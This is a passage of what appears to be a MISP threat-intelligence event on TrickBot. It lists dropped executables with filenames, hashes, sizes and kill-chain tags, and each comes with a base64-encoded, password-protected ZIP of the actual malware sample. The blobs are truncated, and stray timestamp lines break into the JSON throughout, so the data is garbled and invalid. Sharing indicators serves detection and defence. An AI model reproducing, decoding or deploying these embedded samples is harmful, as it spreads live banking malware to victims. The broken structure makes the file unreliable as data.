"uuid": "5e70b073-671c-4c61-97c4-4ab90a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1584440909",
"uuid": "5e70a31f-5d70-41f2-9914-45110a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1584440909",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e70a31f-75a8-4738-b9c9-4c760a0a020f",
"value": "VMMM.exe|1853b48b655d5bd0a34791a93da8647c",
"Tag": [
{
"colour": "#c5008e",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Installation",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1584440095",
"to_ids": false,
"type": "filename",
"uuid": "5e70a31f-f590-4b24-8fea-4cff0a0a020f",
"value": "VMMM.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1584440095",
"to_ids": true,
"type": "md5",
"uuid": "5e70a31f-708c-4060-a4eb-47480a0a020f",
"value": "1853b48b655d5bd0a34791a93da8647c"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1584440095",
"to_ids": true,
"type": "sha1",
"uuid": "5e70a31f-0b48-4e8c-8c27-4d4b0a0a020f",
"value": "bfb30a9a08612be1a772fba531cf885bb8cf48aa"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1584440095",
"to_ids": true,
"type": "sha256",
"uuid": "5e70a31f-2360-448b-8a84-41a10a0a020f",
"value": "281651b91568f18d3aca7c28d4f1b0f5220673736afb41a00c268cac2355bfc3"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1584440095",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e70a31f-7f84-4937-b1e8-41e80a0a020f",
"value": "262144"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1584440909",
"uuid": "5e70a382-87ec-4e10-a667-4bfa0a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "UEsDBBQACQAIABFScVDeHqAnl+YDAAAQBgAgABwAMDVlZGNiMGViODRjMzM4MzMxODY0NjViODFhN2ZlOWNVVAkAA4GjcF6Co3BedXgLAAEEIQAAAAQhAAAAMep79upXfb6vuRn+SfPgk4/WIvROoGbWKf4K/SRPMJQiW0PW1zXe6a35ECzXoLiXNVA0Eyphddx3raozzTmSpnxCZDkxbiZfHSg8tSJYcueZ/4YK75DqFdxX1jId9XaylGjvHUaR/KPaTA2eKRppWFKrSqH96EeF81lzwr5FMayIpdcOA2YXUEO+QwF6bqboFnciXm3As4gvh8kIyWNnOYaHPcv41i6Ez9FkRSys4mEDErUm82EXKN3cGzfWI2gI67AeiihQ8rL+KMdr66qRYEiEDOiBzTWaJulNb3c/sG21B1b+7spY3FTRUPCW4MhT7zHeVNrmvbJewx2PAWHf1JEFoC7l231Qr4C+fg80R1y4+j4INNKaeL2mTEyqoE4MnKRiRsPegVtAZQLb0Hd0Np5UBBgTyqErXjMTD2zT2WsZ2f2f/9IIbInpZ8jVLUKvZ+ayu944Dpe3l7ZhiqQmghLOfHbLsM6iJAsr2+lbolqUbY+6ufL+ArbGJ7DUEGXdsRa8CtpIDLPxdSjOJV0G9SXa6X91JisLLFRHDhyC3+jLHrKVQak77uKrRMNQrq93NJXfSeVH3WbC2nYZH7HZngMT7dIFDuKtbzuDys/4g4bltnbIXZPgAIvRgp6dfEuYc4FzikdTySX5jmpLJ93HamyjSw4u4C1AsjrXj2iDyG6Xl1R8oJFPKV8QPaPniqhpPNR4gD3u6Hf9e8YiazUSC/y3IkKNWP+C+fMAi2FuhPKKb59+CLiQgU6piWjI6l0diZoEI4F+nqZtDBPHQcMCmqJjeKpJSvKSfny4wfaSweP3ihQUC8gPuQX47moklLsEb8OcDmHkN8m30pbjalKhtj3m9WbhAx6B6b1B1gBTq1RqMGk2MNQamukqw4zB43BBmB3Aei77QMsgnnSRkGjkpzg3yf0RBkJQghcfm+puJE7/LGM56M/Cmuft5Q6zTp8mpEM12xF5TnLObZETQMPNu9PdtvcwNXNR7rPe7KA3EgjNcu212h6u7R/ICptW+TNd5sr5WxvFLsInh/ADY8jFwz7rsTC/1rGAT81ZECW22hAbZISN4eftF+wj4WXpQGFx4ncFesH6nqUN3ih1kk0NfwY1GtNGWAlOxE65d17xfX0L1gr9U8C5MrIQVeVfkKjetKLUkSJfwTG+b120sVK59pj93ALYuU/KgJ+oWAeQcV4gdIJFgf+DqrkYTsA+EfZFE0j3voeaPbc+jnUikR5U9911qTtogkV1xnp2fdAP2bOahrNKKd3XByI5KzQtNil8niRZAwo4u8DhSxIDpLipVHZLcjVBDrJaoqBl2AkjTHc5HTw9spvsNUSwioJj7GHrHxN7axj5lz89i+Fnf2NFCyn7m4LtwY4xsTa5GAPYOn02rXIQoWuur/a4emT2JUdIwnJrmoymuUStMbchB2VoorMFUDvTUIbBFGCCbJIhc04yTwX/nTPTvPsLfuyTAVPHzLZPVuXpmi4IjYFtTTFHAjIO11ViEhjZe7b+lJbhw+asXZN35g7KTuhZGilpzj40qnysbyFXZd5zg84uIRLQNc8MfkaZp7wHtJyzQQs5MMYc19Z/yRxpnW74FMTnwUDImaUxjdcxzb8OtKlWYIQXE1y/QujQv0S3nxMTmgAJHulSkUxEpAWlsU4iSV+7H12IvcrnBC16mTOVBAWKOCviJsKRr1/grbFY/1T8ioInTn3ClDiFFkt0IRGYihmN8rJ780cWz2HDc43Q9vKDN7wvPGeeqEvs+DJOI/X9NaP5gFRLFKoMkYIgoL4qDkythynqwQm32xPKfx0yuvcUyXLO4gJrm38NTS0hwTUv3udnUTvIW6Yc5adRXH+lxdblga2ehaf+IRTzH3fCWOwbHXXIcWr56BRNfZ4Tsyo9SFXYcIVB/XZGuU2PnkkFJReZht1UcZdxSd2OfO0agLbT3LWF4nU/b/1zlXgHoyyLg0UdI9llK6YWVgT015qG8YOFZZTzk8sZR2PdtNDFojXn39cy8KglTChUyZsDPQA6xkWIOfJ/gvXq+aV9uOcJXk3vH3k7XzNTYBadcck7UX92fvXU6eZdVDROcE/t7bj6FiYqe5VVG6ASSMbXU0AvfXburjKSzLx7M2g1tMcz6SUzT7hQudd3kXnf7iDGhRpA7/XrlR3SFKquGdt/tCJWi4VodOPr5Y+Z+5k/SAISRIQNzcP2QuXYKG9M/6LYHgXF5cPzwj0KD9DSMWH2Rvu48nyzIJzJakhdrlNA4Wi51PhFOYqXChAgBykbh36JQeYjVfRVXm2XQb5y9oKNqlu3GGf/PCy41greJglSVkrDDpLbdGyVb2jAzj+S2FXM2eqyQuAVNJqOkAxj9BQDaGwNgcGvIEbUT8EvyRm8b0IcoG9OViBEfpoJYBqeJB4DTGiPtShpx8+2Ec6QutJoeLfT/5vw+Wo0iIC477emJypUkTsBvGKqXAY218C8I6RMwMQbUXSZ+plkRj4OEdqXqmZEreZvAA+0sz219fvqE5YG6/zKLjqFYpZ+zICCn5bs1BY1oRItkDn5HBFp1f2CYGRMfbiW804OxcDr3UhnMPx0XeQY4la0s4TL662vUxsoe3Jp68rSR+vIZKSg/nMNs1SLH1FIB+Zg34RVvVN+xM0++9SaxSu2bFdPq/g0Jeldz6ZZd9vl0J8OzDoPh27cF3ASoh+9RMNsqUZzIxz69QKHpFY38vwRsrJx+EbX64wuchI+lNOdZony2WIsoDQ0zGoJXpdZ7fgkQUwxBfhXDdKRHeL1GLlix93w/Q5S670vwn1pV7BilhHakeLEu0wsqCeU8Sp0qfghNOJ1dJlO4ylCGSCipCwEQGEwr44Z6VF7jFThi2D3z4uPpr/gvFnGAFwzgipq/YwroWT4tHseJ2JhVUDNCVvljgLtU9qmcSLrAc1bvCsJzSW1O5sPHkb2qqmNHeGzIBEBI19PMpYfifTnEBJ4Kp9Pi1RULeJrMZ5HVKNGDIt/p1ZqVHs+mbWIRFg/X0d6o1pCE23IWw9LpxP5bf0hb79crSglx3cYl7XV/PB7Uw2UngDq0hSUdQYAnmATPaz/1TAIn05KOHA0Dsg8CXBV53FDbbZuMTdpmIO63eA2giSV2iAYB6ny56okppOGouvCO0gznMD/AGjC5ezbZc2uVsLz/NyRLo+8NMvxqKpkbKj6haFqPviVyfdDnZfMjc8mbjdWA/UKNcSBEghJ+Cf9ZxrVeufxRpyHk84f7zlzyUSVfICa9MkLBtymVl1HrXRJJkkvCaKY35vOuco8jk15Hic5G/P2molF2u6+zDRnMIDCXtVGClI81gwRxgr379qfCIL1DJaJ7h5RBg5UArVoVV+34qOHTjH9cMIkNA4is7SB9CRx0dpdroIslS3m6som3ys+DuyutTCTuvQMuWIL96rVxJqpw0PTnp69JdJ0zCu7JPDeBcqArSjtQgIfPEAG8HFHTdkbOFrQ219en01N+7LEamPkI38XdsMxlOxsA7rV3gWNxDDq9nyFilJ9UaKA27ru5+kfjFymU+5Hh2Wh4MoJMi7MrqXkGDGo2tRrsLkwqUs8VDIq6UgF7cy/siUDpFEdC9z+rCs7EftSIOxMq/anfKQ5btDE8Lk9dHysWn3Z2cvSE4OYIbBLqITvOmI7wVehg2Hy6nsynOKtP11lgFRGOs+IGWj8nsCz+24cVzTQFWwzi+DC09I0/2fGqYaZm0exArnxeSHlPt8E/K4q6N1Y/O55MVJfFmm/ArrPLa1Dqy7FbW4mak4R9gXdmvn8JKDw1E3IXyQnTTln7YPhVi67V0Zy5A53dlHsdb2UMIBbtPcZc6Cv+DjuQEpzPdX9eBx5Tpr/Gmre0UhTHb9dLXANcPdWYh3yQbsKzhcRE4POOPJa+zIAo+l2/9nuS+nqx8VA865zi9G8smG8kHT0jLzIEVwrF6HRkKuVaKnM2E30w3k1LTNl2i
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1584440909",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e70a382-e5f4-4617-8154-4d020a0a020f",
"value": "0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe|05edcb0eb84c33833186465b81a7fe9c",
"Tag": [
{
"colour": "#c5008e",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Installation",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1584440194",
"to_ids": false,
"type": "filename",
"uuid": "5e70a382-7d2c-4394-ad78-4f950a0a020f",
"value": "0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1584440194",
"to_ids": true,
"type": "md5",
"uuid": "5e70a382-1e5c-4d1d-bc44-42f90a0a020f",
"value": "05edcb0eb84c33833186465b81a7fe9c"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1584440194",
"to_ids": true,
"type": "sha1",
"uuid": "5e70a382-0974-441f-af47-41a30a0a020f",
"value": "8e8c984943d0bcde75c7306f0d7f80afaa65e18e"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1584440194",
"to_ids": true,
"type": "sha256",
"uuid": "5e70a382-3ea4-4cd8-8aa1-40700a0a020f",
"value": "f3bc96c4ae65ade028cd97d9b7ae0d82251c4af20ec4cbc4cd1ffefa5ac90eb2"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1584440194",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e70a382-9d58-4d89-8cee-43a30a0a020f",
"value": "397312"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1584440909",
"uuid": "5e70a3c0-8c80-4209-9e58-4d240a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1584440909",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e70a3c0-9a58-41ff-8ecb-44140a0a020f",
"value": "61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe|2f1ac455d1c6e2a3f3e0d1137b047696",
"Tag": [
{
"colour": "#c5008e",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Installation",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1584440256",
"to_ids": false,
"type": "filename",
"uuid": "5e70a3c0-e594-45ad-937d-4c930a0a020f",
"value": "61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1584440256",
